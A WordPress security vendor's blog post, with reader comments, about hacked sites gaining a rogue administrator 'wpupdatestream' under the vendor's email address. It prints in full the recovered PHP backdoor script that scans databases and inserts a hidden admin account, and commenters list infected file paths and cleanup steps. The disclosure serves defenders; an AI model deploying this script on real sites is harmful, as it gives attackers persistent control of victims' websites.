Many who have had their WordPress website or blog hacked noticed a new WordPress user tempuser with the email address support@wpwhitesecurity.com on their WordPress so automatically they assumed it was us.
In fact lately we have been receiving a lot of emails from WordPress administrators asking us if we hacked their website. I do not blame such people, especially if they do not know about us but first of all, please note that we do not engage in such type of activity. We promote WordPress security and raise awareness about it as you can see from our WordPress security blog.
Deciphering the WordPress Hack Attack
Unfortunately we do not have much information about this type of WordPress hack attack. We have been in touch with several independent WordPress security professionals and with Sucuri as well, and all of us are trying to share as much information as we can about this attack but so far we do not have much information.
Creating a WordPress Administrator with WP White Security Email Address
The only thing we know so far is that the attackers are managing to upload the below script which when executed it creates the tempuser with WordPress administrator role. Once the user is created the attackers can login to WordPress via this user and tamper the WordPress website, or inject it with malware.
<?php error_reporting(0); if(isset($_GET['check'])) { echo "pawet"; } if(isset($_POST["v1"])) { $link = mysql_connect($_POST["v1"], $_POST["v2"], $_POST["v3"]); $query = "SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema NOT IN ( 'information_schema', 'performance_schema', 'mysql' )"; $result = mysql_query($query); $tables_list = array(); while ($line = mysql_fetch_array($result)) { if (strpos($line["table_name"],'_options') !== false) { $b = $line["table_schema"].".".$line["table_name"]; $query2 = "select concat(option_value,'|%5%5%5') from ".$b." where option_name='siteurl'"; $result2 = mysql_query($query2); $row = mysql_fetch_row($result2); if (strpos($row[0],'|%5%5%5') !== false) { $p = explode("|", $row[0]); $site_name = $p[0]; $p = explode("_", $line["table_name"]); $table_p = $p[0]."_"; $db = $line["table_schema"]; array_push($tables_list,$b."<|>".$site_name."<|>".$table_p."<|>".$db); } } } foreach($tables_list as $aaa) { $list = explode("<|>", $aaa); $table_pref = $list[2]; $site_name = $list[1]; $db = $list[3]; mysql_select_db($db); $query = "INSERT INTO `".$table_pref."users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`, `display_name`) VALUES ('9192191', 'wpupdatestream', '".base64_decode("JFAkQk5yZmE4eE1Memp0TVhFQjNaeC9IcnhjQXlmV21tLw==")."', 'tempuser', 'support@wpwhitesecurity.com', '0', 'Temp User')"; mysql_query($query); $query = "INSERT INTO `".$table_pref."usermeta` (`umeta_id`,`user_id`,`meta_key`,`meta_value`) VALUES ('9192192', '9192191', '".$table_pref."capabilities', 'a:18:{s:13:\"administrator\";s:1:\"1\";s:34:\"wpml_manage_translation_management\";b:1;s:21:\"wpml_manage_languages\";b:1;s:41:\"wpml_manage_theme_and_plugin_localization\";b:1;s:19:\"wpml_manage_support\";b:1;s:29:\"wpml_manage_media_translation\";b:1;s:22:\"wpml_manage_navigation\";b:1;s:24:\"wpml_manage_sticky_links\";b:1;s:30:\"wpml_manage_string_translation\";b:1;s:33:\"wpml_manage_translation_analytics\";b:1;s:25:\"wpml_manage_wp_menus_sync\";b:1;s:32:\"wpml_manage_taxonomy_translation\";b:1;s:27:\"wpml_manage_troubleshooting\";b:1;s:31:\"wpml_manage_translation_options\";b:1;s:36:\"wpml_manage_woocommerce_multilingual\";b:1;s:37:\"wpml_operate_woocommerce_multilingual\";b:1;s:9:\"translate\";b:1;s:14:\"backwpup_admin\";b:1;}')"; mysql_query($query); $query = "INSERT INTO `".$table_pref."usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES ('9192191', '9192191', '".$table_pref."user_level', '10')"; mysql_query($query); $query3 = "select user_login from `".$table_pref."users` where ID=9192191"; $result3 = mysql_query($query3); $line3 = mysql_fetch_row($result3); if($line3[0] == 'wpupdatestream') { echo $site_name."<|>wpupdatestream<|>p123123|new|"; } } mysql_close($link); } ?>
Why Is the WP White Security Email Address Used?
Good question. Most probably when the author was writing this script he got the SQL script example we used in our article How to Manually Add a WordPress Administrator to the Database using SQL Queries.
How Can WordPress Attackers Upload Such Script?
So far we do not have much information but it could be many things. They can upload such file by gaining FTP access because of weak passwords or an exploit on the server, or because they managed to gain root access to a web server through some old software, which could also be an old version of WordPress, a vulnerable plugin or WordPress theme. For example by exploiting the popular vulnerability in RevSlider plugin discovered a few months back, hackers can gain access to write files to the web server. The options are endless hence why you should at least always use strong passwords and ensure all the software you use is the latest version.
Monitor WordPress To Catch Hackers Red Handed
The above hack is a perfect answer to why you should monitor all the activity on your WordPress and web server as well. Hence always make sure that all the software you run on your web server has logging enabled. If you have all the logs of your web server software and a WordPress monitoring solution such as WP Activity Log plugin you have a complete monitoring solution that allows you to track any suspicious behaviour before it becomes a security issue. Of if your WordPress website has already been hacked, logging can also help you trace back how the attack happened and address the security flaw.
In the meantime, if you have any more information about such attack please let us know by leaving a comment below or drop us an email on support@wpwhitesecurity.com.
36 comments
Hi guys,
This exact hack has happened to me, so thanks for the info!
Same user, and same email address. Wish I knew what the vulnerability is …
Hello Keely,
You’re welcome. Should you have any further information about the attack or need help from our end do not hesitate to get in touch.
Hey guys –
Somebody noticed we had a user on our site:
wpudatestream
with that email you show above. I checked on it, and it had admin privileges, so I changed it to have “NO ROLE” on our site currently while I followed up with y’all to see if this is still a hack?
Thanks!
Hello Scott,
Yes it is still a hack. You should try to dig deeper and see from where the user was generated. If you want further help with the forensics, please get in touch. We’d like to see what happened exactly and help you solve your issue.
How did you change them to no role, I have to do everything through my cpanel because I cant access my website
There is “no role” in WordPress. The best thing is to delete the user. I would recommend you to delete the user from the dashboard hence first think about gaining access back to the website first. You can reset the administrator’s password via PHPMyAdmin or by using FTP.
I had the same thing happen to me
Curious what the vulnerability is/was – my site is still not back to normal
Hello David, you have to remove the infection for your site to return back to normal. Considering the attacker was able to execute a PHP script with malicious code it could be a remote code execution, else if they managed to upload files they could have gained access to your site’s files via other vulnerabilities in other network services so it is better to audit all the server.
Hi David,
I had to upload a fresh copy of the wp-includes folder, and some of my themes’ files were hacked, so uploaded fresh copies of those.
Install a security plugin such as iThemes Security – https://wordpress.org/plugins/better-wp-security/ – which can prevent uploads/changes to folders. And let you know when suspicious activity is going on.
Let me know if you need any help 🙂
Hello Keely,
Did you find the source of the problem though? I.e. by just restoring a backup will only remove the infection but does not close the security flaw which was exploited, so the chance of getting hacked again are very high.
Me too.. Cleaning this up right now actually.. I did a search for “my site was hacked by support@wpwhitesecurity.com” and found this post.
Is there anything from these files that i’m deleting that could help you track this f#@&er down?
*also, as a side note, the CTA just below this form leads to a page not found (WSAL Notificiation Extension)
Hello Jeffrey,
Well so far what we have in that post is all the information we have so before deleting anything which you think might have been tampered during the attack, or have logs or anything else would appropriate if you can forward them to us before deleting it would be great.
* Thanks for the CTA. Fixed.
I’m trying to clean up after the same attack. All of the js files had some script inserted into them. I have the bad code if you’re interested.
Hello Becky,
Yes please. Send it to me on robert@wpwhitesecurity.com. Thank you.
I have the same issue with my website, it was brought to my attention when Google notified me stating my site is suspected to contain malware and slapped a warning on my site, stopping people from viewing it. I have uploaded a previous back up but suspect the hack may have happened prior to my back up. little stuck with what to do next??? Any ideas?
Regard
David
Hello David,
Just send us an email on support@wpwhitesecurity.com and we will help you get sorted. Looking forward to hearing from you.
I also just got hacked by same , I have done nothing to remove him, I dont know where to start or if you could use any information
Hello Tammi,
What we have reported here is the “end result of a hack” i.e. what the hacker is doing to keep control of a WordPress website after exploiting the vulnerability. Which vulnerability did he exploit? It could be many so in your case you have to do a proper audit and find out. We can help you with that as well so feel free to get in touch.
We found the same user wpupdatestream and an image file pic.jpg. Inside that image file I found a JSON script with a base64 decoded string. I guess the hacker is playing from both side (in and out).
What I did is, I searched pic.jpg from cPanel file manager and deleted everything plus I deleted that user wpupdatestream(id=9192191) from wordpress DB. Looks like it is clean now but we are not sure.
I just wanted to share with you.
Thanks
Janaki
Hello Janaki,
Thank you very much for sharing. The problem in these cases is that you cleaned the damage / changes that the hacker did but you did not close the vulnerability he / she exploited. This article explains the “side effects” of a hack, i.e. what the hacker did after exploiting a vulnerability. So in your case I would recommend you to do a proper audit and find out what happened. For future reference, you should keep an audit trail of what is happening on your WordPress. It will definitely be handy.
Hi,
I found a user a few weeks ago named “wpupdatestream” (email: support@wpwhitesecurity.com) in our user section. I couldn’t figure it out, but we had had a few other people working on the site recently and I figured one of them must have been doing something, so I simply deleted the user & all it’s content.
The other day, I logged in and the same user was back! I followed the instructions on this website:
http://odishajobseekers.com/did-you-see-wpupdatestream-user-in-your-wp_users-table/
So, I deleted the user AND the file “t44.php” from the wp-includes folder, which is the php file that contained the exact code you cited at the top of this post.
I’ve also reset our cPanel and FTP passwords & forced a reset for all our WP users.
So far, the user has not returned! Just wanted to let you know about that t44.php file.
Thanks Rob. Yes the problem though remains; how did the attacker gain access to create the file t44.php? Ideally we should find the source of the problem.
Did you find the source?
I want to know if some plugin or else was the way in?
Unfortunately we did not manage to gather much evidence so far. Should you have any information, please feel free to share it with us by sending us an email on support@wpwhitesecurity.com
I have a server running many websites that are inundated with this problem.
I suspect it is due to a plugin named “Gravity Forms”
Thanks for sharing the information. If you have any logs or payload that you can share with us, please send it via email on robert@wpwhitesecurity.com
I dont think its Gravity Forms… I never used it, yet Ive been hacked 🙁
Hello Karolina,
You don’t have to have gravity forms to be hacked. Please send us an email on support@wpwhitesecurity.com if you need any help from our end.
Oh just got hacked by “you” guys… i had a user “support@wpwhitesecurity.com” got blacklisted… as I am in the process of changing hosting it is quite annoying… as whatever they have inserted spreaded over other sites on hosting… I am in deep poo I`d say ;/
I just had this too and seen the user :
9192191 wpupdatestream support@wpwhitesecurity.com
I currently have a Google slap on my site.
Every single JS file had appended malware on it as described here:
https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection.html
My host also found a few infections:
/home/wpbeaches/public_html/wp-content/uploads/gravity_forms/123-08f553b398a4b4c85cb1b2e1d4c3ce1b/tmp/_input__test.php..4ee4d9.bak
/home/wpbeaches/public_html/wp-content/uploads/gravity_forms/2-d79068d65f2d7213620970702262b9de/tmp/_input_5_wow.phtml.ad11fa.bak
Most notably Gravity forms.
I asked for a review from Google but it failed – still working through the mire
I also had this problem.
I checked my Uploads folder and found a php script inside a subfolder called: new_up.php
that had this script inside: http://pastebin.com/BvybRVSb
I removed the user from the database and restored 3 .js files that the hacker changed.
They were:
wp-admin/js/inline-edit-tax.js
wp-includes/js/colorpicker.js
wp-includes/js/imgareaselect/jquery.imgareaselect.js
Thanks for the feedback George. Would it be possible to send me a copy of the infected WordPress files to support@wpwhitesecurity.com?
This happened me today too.
Our site was hacked with this user, post created.
Also created 5-6 .php files in plugins and uploads folder. Even changed the index.php file.
Hello Beamkiller,
Would it be possible to send us a copy of the infected index.php and 5-6.php? Rename their extension to txt please so they are not blocked. Please send them to support@wpwhitesecurity.com and thank you in advance.
Hello,
My website is also hacked and I saw the same user on my user list. I have some doubts about Ajax Comment Posting plugin. Are there anyone using this plugin?
Thanks…
Hi Aykan,
Please note that what you’re seeing is the post exploitation result. If the plugin is not vulnerable as such, then that is not the issue. Can you send us a copy of the infected files to support@wpwhitesecurity.com? Thank you.